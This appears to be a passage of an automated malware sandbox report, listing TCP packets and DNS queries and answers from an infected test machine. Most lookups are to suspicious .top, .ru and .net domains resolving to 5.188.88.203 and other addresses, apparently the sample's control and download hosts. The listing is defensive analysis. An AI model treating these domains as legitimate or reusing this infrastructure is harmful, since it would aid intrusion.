                                                                                                                                                Oct 29, 2021 14:08:51.665215015 CEST49732443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.666805029 CEST49732443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.666832924 CEST4434973223.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.686347008 CEST4434973123.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.686470032 CEST49731443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.698685884 CEST49731443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.699249029 CEST49731443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.699281931 CEST4434973123.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.701167107 CEST49733443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.701222897 CEST4434973323.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.701373100 CEST49733443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.704227924 CEST4434973223.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.704361916 CEST49732443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.705548048 CEST49733443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.705575943 CEST4434973323.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.705866098 CEST49732443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.706507921 CEST49732443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.706571102 CEST4434973223.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.718539000 CEST49734443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.718595982 CEST4434973423.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.718697071 CEST49734443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.719041109 CEST49734443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.719069004 CEST4434973423.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.721164942 CEST4434973123.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.721184969 CEST4434973123.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.721221924 CEST4434973123.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.721262932 CEST49731443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.721282959 CEST49731443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.721302986 CEST49731443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.733728886 CEST49735443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.733783007 CEST4434973523.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.733951092 CEST49735443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.734678984 CEST49731443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.734740973 CEST4434973123.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.735182047 CEST49735443192.168.2.323.211.6.115
                                                                                                                                                Oct 29, 2021 14:08:51.735204935 CEST4434973523.211.6.115192.168.2.3
                                                                                                                                                Oct 29, 2021 14:08:51.736974001 CEST4434973223.211.6.115192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 29, 2021 14:09:40.249532938 CEST | 192.168.2.3 | 8.8.8.8 | 0xc836 | Standard query (0) | xacokuo8.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:09:40.372556925 CEST | 192.168.2.3 | 8.8.8.8 | 0xff0c | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:09:40.629740953 CEST | 192.168.2.3 | 8.8.8.8 | 0x5478 | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:09:40.880671978 CEST | 192.168.2.3 | 8.8.8.8 | 0xbc14 | Standard query (0) | privacytoolzforyou-6000.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:09:43.668574095 CEST | 192.168.2.3 | 8.8.8.8 | 0x9db3 | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:09:44.010621071 CEST | 192.168.2.3 | 8.8.8.8 | 0x8a09 | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:00.299552917 CEST | 192.168.2.3 | 8.8.8.8 | 0x9567 | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:00.549968958 CEST | 192.168.2.3 | 8.8.8.8 | 0x947a | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:00.831943989 CEST | 192.168.2.3 | 8.8.8.8 | 0x562 | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:01.170274973 CEST | 192.168.2.3 | 8.8.8.8 | 0x1495 | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:01.426273108 CEST | 192.168.2.3 | 8.8.8.8 | 0x91d9 | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:03.559824944 CEST | 192.168.2.3 | 8.8.8.8 | 0xb9c4 | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:03.810604095 CEST | 192.168.2.3 | 8.8.8.8 | 0x1c0b | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:04.063611031 CEST | 192.168.2.3 | 8.8.8.8 | 0xffeb | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:04.738146067 CEST | 192.168.2.3 | 8.8.8.8 | 0xaa7b | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:07.089852095 CEST | 192.168.2.3 | 8.8.8.8 | 0x7901 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:07.929352045 CEST | 192.168.2.3 | 8.8.8.8 | 0x26e2 | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:08.174237013 CEST | 192.168.2.3 | 8.8.8.8 | 0xf2b4 | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:09.930037975 CEST | 192.168.2.3 | 8.8.8.8 | 0x4ec3 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:11.287599087 CEST | 192.168.2.3 | 8.8.8.8 | 0x1089 | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:11.535811901 CEST | 192.168.2.3 | 8.8.8.8 | 0xf6e9 | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:11.784204960 CEST | 192.168.2.3 | 8.8.8.8 | 0x524a | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:12.428087950 CEST | 192.168.2.3 | 8.8.8.8 | 0xe2ab | Standard query (0) | iyc.jelikob.ru | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:12.735543966 CEST | 192.168.2.3 | 8.8.8.8 | 0x614c | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:12.990253925 CEST | 192.168.2.3 | 8.8.8.8 | 0xe0e1 | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:13.261889935 CEST | 192.168.2.3 | 8.8.8.8 | 0xfe4b | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:13.544400930 CEST | 192.168.2.3 | 8.8.8.8 | 0xc420 | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:15.586174965 CEST | 192.168.2.3 | 8.8.8.8 | 0xd0bf | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:15.862766027 CEST | 192.168.2.3 | 8.8.8.8 | 0x7c2a | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:16.132903099 CEST | 192.168.2.3 | 8.8.8.8 | 0x2b2c | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:16.393680096 CEST | 192.168.2.3 | 8.8.8.8 | 0xb9bf | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:16.650090933 CEST | 192.168.2.3 | 8.8.8.8 | 0x6ef3 | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:18.816096067 CEST | 192.168.2.3 | 8.8.8.8 | 0xc1c0 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:19.878665924 CEST | 192.168.2.3 | 8.8.8.8 | 0x7415 | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:20.138806105 CEST | 192.168.2.3 | 8.8.8.8 | 0xfda9 | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:20.468445063 CEST | 192.168.2.3 | 8.8.8.8 | 0x77e | Standard query (0) | sysaheu90.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:27.111479998 CEST | 192.168.2.3 | 8.8.8.8 | 0xa277 | Standard query (0) | hajezey1.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:27.389888048 CEST | 192.168.2.3 | 8.8.8.8 | 0x97af | Standard query (0) | accounts.google.com | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:27.389945984 CEST | 192.168.2.3 | 8.8.8.8 | 0x48f4 | Standard query (0) | clients2.google.com | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:29.239370108 CEST | 192.168.2.3 | 8.8.8.8 | 0xa8d1 | Standard query (0) | js.monitor.azure.com | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:29.573542118 CEST | 192.168.2.3 | 8.8.8.8 | 0xa6e9 | Standard query (0) | github.com | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:30.214529037 CEST | 192.168.2.3 | 8.8.8.8 | 0x3598 | Standard query (0) | avatars.githubusercontent.com | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:31.983638048 CEST | 192.168.2.3 | 8.8.8.8 | 0xa3c2 | Standard query (0) | github.com | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:32.245552063 CEST | 192.168.2.3 | 8.8.8.8 | 0xab43 | Standard query (0) | avatars.githubusercontent.com | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:34.801071882 CEST | 192.168.2.3 | 8.8.8.8 | 0x63a | Standard query (0) | telegalive.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:37.919708014 CEST | 192.168.2.3 | 8.8.8.8 | 0x9d28 | Standard query (0) | telegalive.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:41.363266945 CEST | 192.168.2.3 | 8.8.8.8 | 0x26e8 | Standard query (0) | telegalive.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:44.169285059 CEST | 192.168.2.3 | 8.8.8.8 | 0x59b | Standard query (0) | clients2.googleusercontent.com | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:44.604974985 CEST | 192.168.2.3 | 8.8.8.8 | 0x7156 | Standard query (0) | telegalive.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:48.412956953 CEST | 192.168.2.3 | 8.8.8.8 | 0x45dd | Standard query (0) | telegalive.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:51.762058020 CEST | 192.168.2.3 | 8.8.8.8 | 0xe31b | Standard query (0) | telegalive.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:51.895178080 CEST | 192.168.2.3 | 8.8.8.8 | 0x51b2 | Standard query (0) | toptelete.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:57.205171108 CEST | 192.168.2.3 | 8.8.8.8 | 0x4151 | Standard query (0) | nusurtal4f.net | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:57.765567064 CEST | 192.168.2.3 | 8.8.8.8 | 0xed61 | Standard query (0) | znpst.top | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:09.428842068 CEST | 192.168.2.3 | 8.8.8.8 | 0x4603 | Standard query (0) | api.2ip.ua | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:11.175357103 CEST | 192.168.2.3 | 8.8.8.8 | 0x5091 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:12.704349995 CEST | 192.168.2.3 | 8.8.8.8 | 0xed15 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:17.404216051 CEST | 192.168.2.3 | 8.8.8.8 | 0x9631 | Standard query (0) | mas.to | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:20.502801895 CEST | 192.168.2.3 | 8.8.8.8 | 0x14c7 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:22.049130917 CEST | 192.168.2.3 | 8.8.8.8 | 0x1f6 | Standard query (0) | mas.to | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:41.048815012 CEST | 192.168.2.3 | 8.8.8.8 | 0x5be6 | Standard query (0) | api.2ip.ua | A (IP address) | IN (0x0001)
Oct 29, 2021 14:11:45.143712044 CEST | 192.168.2.3 | 8.8.8.8 | 0xa4e4 | Standard query (0) | api.2ip.ua | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 29, 2021 14:09:40.349797010 CEST | 8.8.8.8 | 192.168.2.3 | 0xc836 | Name error (3) | xacokuo8.top | none | none | A (IP address) | IN (0x0001)
Oct 29, 2021 14:09:40.389902115 CEST | 8.8.8.8 | 192.168.2.3 | 0xff0c | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:09:40.648988008 CEST | 8.8.8.8 | 192.168.2.3 | 0x5478 | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:09:41.235708952 CEST | 8.8.8.8 | 192.168.2.3 | 0xbc14 | No error (0) | privacytoolzforyou-6000.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:09:43.688175917 CEST | 8.8.8.8 | 192.168.2.3 | 0x9db3 | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:09:44.030148983 CEST | 8.8.8.8 | 192.168.2.3 | 0x8a09 | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:00.318998098 CEST | 8.8.8.8 | 192.168.2.3 | 0x9567 | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:00.569439888 CEST | 8.8.8.8 | 192.168.2.3 | 0x947a | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:00.851335049 CEST | 8.8.8.8 | 192.168.2.3 | 0x562 | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:01.189889908 CEST | 8.8.8.8 | 192.168.2.3 | 0x1495 | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:01.445811987 CEST | 8.8.8.8 | 192.168.2.3 | 0x91d9 | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:03.579739094 CEST | 8.8.8.8 | 192.168.2.3 | 0xb9c4 | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:03.829663992 CEST | 8.8.8.8 | 192.168.2.3 | 0x1c0b | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:04.354789019 CEST | 8.8.8.8 | 192.168.2.3 | 0xffeb | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:04.758182049 CEST | 8.8.8.8 | 192.168.2.3 | 0xaa7b | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:07.112236023 CEST | 8.8.8.8 | 192.168.2.3 | 0x7901 | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:07.112236023 CEST | 8.8.8.8 | 192.168.2.3 | 0x7901 | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:07.112236023 CEST | 8.8.8.8 | 192.168.2.3 | 0x7901 | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:07.112236023 CEST | 8.8.8.8 | 192.168.2.3 | 0x7901 | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:07.112236023 CEST | 8.8.8.8 | 192.168.2.3 | 0x7901 | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:07.948779106 CEST | 8.8.8.8 | 192.168.2.3 | 0x26e2 | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:08.648478031 CEST | 8.8.8.8 | 192.168.2.3 | 0xf2b4 | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:09.950828075 CEST | 8.8.8.8 | 192.168.2.3 | 0x4ec3 | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:09.950828075 CEST | 8.8.8.8 | 192.168.2.3 | 0x4ec3 | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:09.950828075 CEST | 8.8.8.8 | 192.168.2.3 | 0x4ec3 | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:09.950828075 CEST | 8.8.8.8 | 192.168.2.3 | 0x4ec3 | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:09.950828075 CEST | 8.8.8.8 | 192.168.2.3 | 0x4ec3 | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:11.306994915 CEST | 8.8.8.8 | 192.168.2.3 | 0x1089 | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:11.555179119 CEST | 8.8.8.8 | 192.168.2.3 | 0xf6e9 | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:12.161859035 CEST | 8.8.8.8 | 192.168.2.3 | 0x524a | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:12.493707895 CEST | 8.8.8.8 | 192.168.2.3 | 0xe2ab | No error (0) | iyc.jelikob.ru | | 81.177.141.36 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:12.754959106 CEST | 8.8.8.8 | 192.168.2.3 | 0x614c | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:13.009208918 CEST | 8.8.8.8 | 192.168.2.3 | 0xe0e1 | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:13.281296968 CEST | 8.8.8.8 | 192.168.2.3 | 0xfe4b | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:13.564043045 CEST | 8.8.8.8 | 192.168.2.3 | 0xc420 | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:15.605772018 CEST | 8.8.8.8 | 192.168.2.3 | 0xd0bf | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:15.882200956 CEST | 8.8.8.8 | 192.168.2.3 | 0x7c2a | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:16.153029919 CEST | 8.8.8.8 | 192.168.2.3 | 0x2b2c | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:16.413116932 CEST | 8.8.8.8 | 192.168.2.3 | 0xb9bf | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:16.670523882 CEST | 8.8.8.8 | 192.168.2.3 | 0x6ef3 | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:18.838687897 CEST | 8.8.8.8 | 192.168.2.3 | 0xc1c0 | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:18.838687897 CEST | 8.8.8.8 | 192.168.2.3 | 0xc1c0 | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:18.838687897 CEST | 8.8.8.8 | 192.168.2.3 | 0xc1c0 | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:18.838687897 CEST | 8.8.8.8 | 192.168.2.3 | 0xc1c0 | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:18.838687897 CEST | 8.8.8.8 | 192.168.2.3 | 0xc1c0 | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:19.898004055 CEST | 8.8.8.8 | 192.168.2.3 | 0x7415 | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:20.157886028 CEST | 8.8.8.8 | 192.168.2.3 | 0xfda9 | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:20.488089085 CEST | 8.8.8.8 | 192.168.2.3 | 0x77e | No error (0) | sysaheu90.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:27.131249905 CEST | 8.8.8.8 | 192.168.2.3 | 0xa277 | No error (0) | hajezey1.top | | 5.188.88.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:27.417649031 CEST | 8.8.8.8 | 192.168.2.3 | 0x97af | No error (0) | accounts.google.com | | 172.217.168.45 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:27.429796934 CEST | 8.8.8.8 | 192.168.2.3 | 0x48f4 | No error (0) | clients2.google.com | clients.l.google.com | | CNAME (Canonical name) | IN (0x0001)
Oct 29, 2021 14:10:27.429796934 CEST | 8.8.8.8 | 192.168.2.3 | 0x48f4 | No error (0) | clients.l.google.com | | 142.250.203.110 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:29.266856909 CEST | 8.8.8.8 | 192.168.2.3 | 0xa8d1 | No error (0) | js.monitor.azure.com | aijscdn2.azureedge.net | | CNAME (Canonical name) | IN (0x0001)
Oct 29, 2021 14:10:29.274403095 CEST | 8.8.8.8 | 192.168.2.3 | 0x7d5f | No error (0) | consentdeliveryfd.azurefd.net | firstparty-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001)
Oct 29, 2021 14:10:29.594722033 CEST | 8.8.8.8 | 192.168.2.3 | 0xa6e9 | No error (0) | github.com | | 140.82.121.4 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:30.233423948 CEST | 8.8.8.8 | 192.168.2.3 | 0x3598 | No error (0) | avatars.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:30.233423948 CEST | 8.8.8.8 | 192.168.2.3 | 0x3598 | No error (0) | avatars.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:30.233423948 CEST | 8.8.8.8 | 192.168.2.3 | 0x3598 | No error (0) | avatars.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:30.233423948 CEST | 8.8.8.8 | 192.168.2.3 | 0x3598 | No error (0) | avatars.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:32.007085085 CEST | 8.8.8.8 | 192.168.2.3 | 0xa3c2 | No error (0) | github.com | | 140.82.121.4 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:32.264583111 CEST | 8.8.8.8 | 192.168.2.3 | 0xab43 | No error (0) | avatars.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:32.264583111 CEST | 8.8.8.8 | 192.168.2.3 | 0xab43 | No error (0) | avatars.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:32.264583111 CEST | 8.8.8.8 | 192.168.2.3 | 0xab43 | No error (0) | avatars.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:32.264583111 CEST | 8.8.8.8 | 192.168.2.3 | 0xab43 | No error (0) | avatars.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:34.820704937 CEST | 8.8.8.8 | 192.168.2.3 | 0x63a | Name error (3) | telegalive.top | none | none | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:38.020772934 CEST | 8.8.8.8 | 192.168.2.3 | 0x9d28 | Name error (3) | telegalive.top | none | none | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:41.382754087 CEST | 8.8.8.8 | 192.168.2.3 | 0x26e8 | Name error (3) | telegalive.top | none | none | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:44.196780920 CEST | 8.8.8.8 | 192.168.2.3 | 0x59b | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001)
Oct 29, 2021 14:10:44.196780920 CEST | 8.8.8.8 | 192.168.2.3 | 0x59b | No error (0) | googlehosted.l.googleusercontent.com | | 142.250.203.97 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:44.624536991 CEST | 8.8.8.8 | 192.168.2.3 | 0x7156 | Name error (3) | telegalive.top | none | none | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:48.432509899 CEST | 8.8.8.8 | 192.168.2.3 | 0x45dd | Name error (3) | telegalive.top | none | none | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:51.781487942 CEST | 8.8.8.8 | 192.168.2.3 | 0xe31b | Name error (3) | telegalive.top | none | none | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:51.918087006 CEST | 8.8.8.8 | 192.168.2.3 | 0x51b2 | No error (0) | toptelete.top | | 172.67.160.46 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:51.918087006 CEST | 8.8.8.8 | 192.168.2.3 | 0x51b2 | No error (0) | toptelete.top | | 104.21.9.146 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:57.240221977 CEST | 8.8.8.8 | 192.168.2.3 | 0x4151 | No error (0) | nusurtal4f.net | | 45.141.84.21 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:58.028448105 CEST | 8.8.8.8 | 192.168.2.3 | 0xed61 | No error (0) | znpst.top | | 211.59.14.90 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:58.028448105 CEST | 8.8.8.8 | 192.168.2.3 | 0xed61 | No error (0) | znpst.top | | 222.236.49.123 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:58.028448105 CEST | 8.8.8.8 | 192.168.2.3 | 0xed61 | No error (0) | znpst.top | | 118.221.132.200 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:58.028448105 CEST | 8.8.8.8 | 192.168.2.3 | 0xed61 | No error (0) | znpst.top | | 115.88.24.203 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:58.028448105 CEST | 8.8.8.8 | 192.168.2.3 | 0xed61 | No error (0) | znpst.top | | 89.201.145.218 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:58.028448105 CEST | 8.8.8.8 | 192.168.2.3 | 0xed61 | No error (0) | znpst.top | | 92.62.104.245 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:58.028448105 CEST | 8.8.8.8 | 192.168.2.3 | 0xed61 | No error (0) | znpst.top | | 211.169.6.249 | A (IP address) | IN (0x0001)
Oct 29, 2021 14:10:58.028448105 CEST | 8.8.8.8 | 192.168.2.3 | 0xed61 | No error (0) | znpst.top | | 179.178.42.164 | A (IP address) | IN (0x0001)
